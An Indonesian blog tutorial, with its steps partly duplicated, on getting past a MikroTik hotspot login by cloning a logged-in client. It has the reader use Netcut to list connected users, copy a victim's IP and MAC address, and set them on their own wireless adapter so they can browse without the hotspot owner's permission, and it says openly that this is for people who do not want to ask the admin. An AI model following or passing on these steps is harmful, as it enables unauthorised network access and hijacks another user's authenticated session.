6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.
7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C
9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.
Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all
10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.
11. Hasil :
Sebelum melakukan clone
Sesudah melakukan clone
Tutorial ini hanya untuk mereka yang malas bertanya username dan password pada admin jaringan. Malu bertanya tidak bisa browsing.
Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.
Berikut langkah-langkahnya :
1. Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. Netcut bisa didownload disini.
2. Koneksikan komputer kita dengan hotspot mikrotik
3. Jalankan program Netcut
4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard
5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi yang akan kita jadikan target (dalam contoh ini yang menjadi target adalah network dengan IP 192.168.182.18). Yang jelas bukan network kita atau network server.
6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.
7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C
9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.
Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all
10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.
11. Hasil :
Sebelum melakukan clone
Sesudah melakukan clone
Tutorial ini hanya untuk mereka yang malas bertanya username dan password pada admin jaringan. Malu bertanya tidak bisa browsing.
Langganan:
Postingan (Atom)